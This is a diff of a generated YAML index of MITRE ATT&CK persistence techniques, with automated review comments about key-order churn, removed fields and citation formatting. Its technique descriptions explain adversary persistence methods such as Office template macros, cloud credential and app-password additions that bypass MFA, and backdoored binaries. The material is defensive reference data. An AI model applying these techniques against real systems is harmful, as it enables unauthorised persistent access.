Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -31113,55 +31520,10 @@ persistence:
- SYSTEM
x_mitre_system_requirements:
- Ability to update component device firmware from the host operating system.
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1137.001:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
- type: attack-pattern
- created: '2019-11-07T20:29:17.788Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.001
- url: https://attack.mitre.org/techniques/T1137/001
- - url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
- description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
- Retrieved July 3, 2017.
- source_name: Microsoft Change Normal Template
- - url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
- description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
- Retrieved July 3, 2017.
- source_name: MSDN VBA in Office
- - url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
- description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
- Retrieved July 3, 2017.
- source_name: enigma0x3 normal.dotm
- - url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
- description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
- Retrieved July 3, 2017.
- source_name: Hexacorn Office Template Macros
- - source_name: GlobalDotName Jun 2019
- url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
- description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
- - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
- - source_name: CrowdStrike Outlook Forms
- url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
- description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
- Movement and Persistence. Retrieved February 5, 2019.
- - source_name: Outlook Today Home Page
- url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
- description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
- Retrieved February 5, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:01:35.918Z'
name: 'Office Application Startup: Office Template Macros.'
description: "Adversaries may abuse Microsoft Office templates to obtain persistence
on a compromised system. Microsoft Office contains templates that are part
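Review bot: the 45 removed lines in this hunk are not a content change; `x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` for T1137.001 are all re-emitted at the end of the object in a later hunk (with `Office 365` replaced by `Office Suite` there). A stable key order in the generator would shrink this to a handful of lines and make the actual changes (the new `modified` value, the platform rename, `1.1` -> `1.2`, `x_mitre_deprecated: false`) reviewable at a glance. Unrelated to this change: the `name` value keeps a trailing period (`Office Template Macros.`), which comes from the upstream data and is not touched here.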
@@ -31192,6 +31554,7 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: 'Many Office-related persistence mechanisms require changes
to the Registry and for binaries, files, or scripts to be written to disk
or existing files modified to include malicious scripts. Collect events related
@@ -31201,9 +31564,13 @@ persistence:
also be investigated since the base templates should likely not contain VBA
macros. Changes to the Office macro security settings should also be investigated.(Citation:
GlobalDotName Jun 2019)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
@@ -31211,11 +31578,47 @@ persistence:
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
+ created: '2019-11-07T20:29:17.788Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/001
+ external_id: T1137.001
+ - source_name: MSDN VBA in Office
+ description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
+ Retrieved July 3, 2017.
+ url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
+ - source_name: Hexacorn Office Template Macros
+ description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
+ Retrieved July 3, 2017.
+ url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
+ - source_name: Microsoft Change Normal Template
+ description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
+ Retrieved July 3, 2017.
+ url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
+ - source_name: enigma0x3 normal.dotm
+ description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
+ Retrieved July 3, 2017.
+ url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
+ - source_name: CrowdStrike Outlook Forms
+ description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
+ Movement and Persistence. Retrieved February 5, 2019.
+ url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+ - source_name: GlobalDotName Jun 2019
+ description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+ - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+ url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+ - source_name: Outlook Today Home Page
+ description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+ Retrieved February 5, 2019.
+ url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.001
atomic_tests: []
T1546.009:
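Review bot: `x_mitre_permissions_required` (`User`, `Administrator`) is removed from T1137.001 with no replacement. That field was retired upstream, so the removal is expected, but if anything in this repo filters or labels tests by required permissions from this index, it will now see no value for this technique; worth a quick search for consumers of that key. The rest of the hunk re-adds the identity fields and `external_references` moved out of the object's head in the earlier hunk, with the entries re-sorted (`MSDN VBA in Office` now precedes `Hexacorn Office Template Macros`) but their text unchanged.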
@@ -31247,7 +31650,7 @@ persistence:
description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
Retrieved December 18, 2017.
source_name: Sysinternals AppCertDlls Oct 2007
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.052Z'
name: 'Event Triggered Execution: AppCert DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -31295,13 +31698,11 @@ persistence:
x_mitre_effective_permissions:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.009
atomic_tests: []
T1098.005:
technique:
- modified: '2023-10-03T17:38:39.065Z'
+ modified: '2024-09-25T20:39:53.597Z'
name: Device Registration
description: "Adversaries may register a device to an adversary-controlled account.
Devices may be registered in a multifactor authentication (MFA) system, which
@@ -31314,16 +31715,16 @@ persistence:
FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
only a username and password to enroll the account's first device or to enroll
a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
- an adversary with existing access to a network may register a device to Azure
- AD and/or its device management system, Microsoft Intune, in order to access
+ an adversary with existing access to a network may register a device to Entra
+ ID and/or its device management system, Microsoft Intune, in order to access
sensitive data or resources while bypassing conditional access policies.(Citation:
AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
- Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+ Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
campaigns via intra-organizational emails, which are less likely to be treated
as suspicious by the email client.(Citation: Microsoft - Device Registration)
Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
- on an Azure AD tenant by registering a large number of devices.(Citation:
+ on an Entra ID tenant by registering a large number of devices.(Citation:
AADInternals - BPRT)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -31335,16 +31736,16 @@ persistence:
- Mike Moran
- Joe Gumke, U.S. Bank
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- Windows
- - SaaS
- x_mitre_version: '1.2'
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Active Directory: Active Directory Object Creation'
@@ -31399,7 +31800,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1542:
technique:
@@ -31460,7 +31860,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.015:
technique:
@@ -31536,7 +31935,7 @@ persistence:
url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
5, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T16:36:37.042Z'
name: 'Boot or Logon Autostart Execution: Login Items'
description: |-
Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled
.
@@ -31564,8 +31963,6 @@ persistence:
- 'File: File Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.015
atomic_tests: []
T1205.001:
@@ -31591,7 +31988,7 @@ persistence:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -31616,23 +32013,21 @@ persistence:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1098.001:
technique:
- modified: '2024-02-28T14:35:00.862Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Credentials'
description: "Adversaries may add adversary-controlled credentials to a cloud
account to maintain persistent access to victim accounts and instances within
the environment.\n\nFor example, adversaries may add credentials for Service
Principals and Applications in addition to existing legitimate credentials
- in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
- Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
- both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
- With sufficient permissions, there are a variety of ways to add credentials
- including the Azure Portal, Azure command line interface, and Azure or Az
- PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+ in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+ Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+ include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+ Guidance) With sufficient permissions, there are a variety of ways to add
+ credentials including the Azure Portal, Azure command line interface, and
+ Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
infrastructure-as-a-service (IaaS) environments, after gaining access through
[Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
may generate or import their own SSH keys using either the CreateKeyPair
@@ -31642,11 +32037,15 @@ persistence:
usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey
API in AWS or the gcloud iam service-accounts keys create
command
- in GCP to add access keys to an account. If the target account has different
- permissions from the requesting account, the adversary may also be able to
- escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+ in GCP to add access keys to an account. Alternatively, they may use the CreateLoginProfile
+ API in AWS to add a password that can be used to log into the AWS Management
+ Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+ Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+ If the target account has different permissions from the requesting account,
+ the adversary may also be able to escalate their privileges in the environment
+ (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
- 2.0) For example, in Azure AD environments, an adversary with the Application
+ 2.0) For example, in Entra ID environments, an adversary with the Application
Administrator role can add a new set of credentials to their application's
service principal. In doing so the adversary would be able to access the service
principal’s roles and permissions, which may be different from those of the
@@ -31657,12 +32056,19 @@ persistence:
tied to the permissions of the original user account. These temporary credentials
may remain valid for the duration of their lifetime even if the original account’s
API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
- Persistence)"
+ Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+ adversaries may be able to add an app password to a user account.(Citation:
+ Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+ legacy devices that do not support multi-factor authentication (MFA), adding
+ an app password can allow an adversary to bypass MFA requirements. Additionally,
+ app passwords may remain valid even if the user’s primary password is reset.(Citation:
+ Microsoft Entra ID App Passwords)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Expel
- Oleg Kolesnikov, Securonix
@@ -31671,6 +32077,7 @@ persistence:
- Alex Soler, AttackIQ
- Dylan Silva, AWS Security
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -31679,13 +32086,16 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- - Azure AD
- SaaS
- x_mitre_version: '2.7'
+ - Identity Provider
+ x_mitre_version: '2.8'
x_mitre_data_sources:
- 'User Account: User Account Modification'
+ - 'Active Directory: Active Directory Object Creation'
+ - 'Active Directory: Active Directory Object Modification'
type: attack-pattern
id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
created: '2020-01-19T16:10:15.008Z'
@@ -31711,10 +32121,18 @@ persistence:
description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
Principals. Retrieved January 19, 2020.
url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+ - source_name: Lacework AI Resource Hijacking 2024
+ description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+ June 6). Lacework Labs. Retrieved July 1, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
- source_name: GCP SSH Key Add
description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
October 1, 2020.
url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
- source_name: Blue Cloud of Death Video
description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
Azure. Retrieved November 21, 2019.'
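Review bot: the new `Lacework AI Resource Hijacking 2024` entry puts the title before the date and author (`Detecting AI resource-hijacking with Composite Alerts. (2024, June 6). Lacework Labs.`), while every other entry in this list uses author, date, title. The text is copied from the upstream data, so it is only worth touching if the generator normalises citation strings; otherwise leave it and raise it upstream. Both new `source_name` values in this hunk (`Lacework AI Resource Hijacking 2024`, `Permiso Scattered Spider 2023`) match the `(Citation: ...)` keys added to the T1098.001 description earlier in this diff, so the citations resolve.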
@@ -31723,10 +32141,20 @@ persistence:
description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
Azure. Retrieved October 23, 2019.'
url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+ - source_name: Microsoft Entra ID App Passwords
+ description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+ authentication with legacy applications using app passwords. Retrieved May
+ 28, 2024.
+ url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+ - source_name: Mandiant APT42 Operations 2024
+ description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+ Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+ Retrieved May 28, 2024.'
+ url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
- source_name: Expel Behind the Scenes
description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -31743,14 +32171,11 @@ persistence:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.001
atomic_tests: []
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -31825,7 +32250,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.003:
technique:
@@ -31914,24 +32338,27 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.003
atomic_tests: []
T1554:
technique:
- modified: '2024-04-16T13:03:40.824Z'
+ modified: '2024-10-12T16:52:46.067Z'
name: Compromise Host Software Binary
description: |-
Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
- Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.
+ Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)
An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
+
+ After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_contributors:
- CrowdStrike Falcon OverWatch
+ - Liran Ravich, CardinalOps
+ - Jamie Williams (U ω U), PANW Unit 42
x_mitre_deprecated: false
x_mitre_detection: "Collect and analyze signing certificate metadata and check
signature validity on software that executes within the environment. Look
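Review bot: the added T1554 description keeps the upstream typo "persistence though modifications" (should be "through"); since this file is generated from ATT&CK data it should not be hand-edited here, but the typo is worth reporting upstream. Note also that the new text cites (Citation: Google Cloud Mandiant UNC3886 2024) whose `external_references` entry is only added in a later hunk of this same technique, so the two hunks must land together or the citation dangles.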
@@ -31945,7 +32372,7 @@ persistence:
- Linux
- macOS
- Windows
- x_mitre_version: '2.0'
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Deletion'
- 'File: File Modification'
@@ -31960,6 +32387,11 @@ persistence:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1554
external_id: T1554
+ - source_name: Google Cloud Mandiant UNC3886 2024
+ description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+ Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+ Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+ url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
- source_name: Unit42 Banking Trojans Hooking 2022
description: 'Or Chechik. (2022, October 31). Banking Trojan Techniques: How
Financially Motivated Malware Became Infrastructure. Retrieved September
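Review bot: the added `description` for "Google Cloud Mandiant UNC3886 2024" begins with a leading space inside the double-quoted scalar (`" Punsaen Boonyakarn, ...`), which survives YAML parsing as part of the string. It is probably verbatim from the upstream object, so leave it unless the generator normalizes whitespace for other references, in which case it should strip it here too.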
@@ -31973,11 +32405,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:27:11.065Z'
name: 'Event Triggered Execution: Change Default File Association'
description: "Adversaries may establish persistence by executing malicious content
triggered by a file type association. When a file is opened, the default program
@@ -32003,7 +32434,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
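Review bot: this hunk removes `x_mitre_attack_spec_version: 2.1.0` from T1546.001 and the next one removes `x_mitre_modified_by_ref`, yet both keys are re-added (with the spec version bumped to 3.2.0) at the end of the same technique after `object_marking_refs`; the same key-order churn shows up for T1136.003 and T1547.006 further down. Pinning a canonical key order (or sorting keys) in the generator would keep future diffs limited to real content changes.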
@@ -32017,7 +32447,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -32044,8 +32473,8 @@ persistence:
url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
- source_name: Microsoft File Handlers
description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
- Retrieved November 13, 2014.
- url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+ Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
- source_name: Microsoft Assoc Oct 2017
description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
7, 2018.
@@ -32056,7 +32485,8 @@ persistence:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.001
atomic_tests: []
T1546.014:
@@ -32097,7 +32527,7 @@ persistence:
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients
, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist
.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T00:16:01.732Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Emond'
x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -32117,12 +32547,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.014
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -32176,11 +32605,10 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547.001:
technique:
- modified: '2023-10-16T09:08:22.319Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
description: |-
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -32267,9 +32695,9 @@ persistence:
in the Registry. Retrieved August 3, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Oddvar Moe RunOnceEx Mar 2018
description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
from Autoruns.exe. Retrieved June 29, 2018.
@@ -32282,12 +32710,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
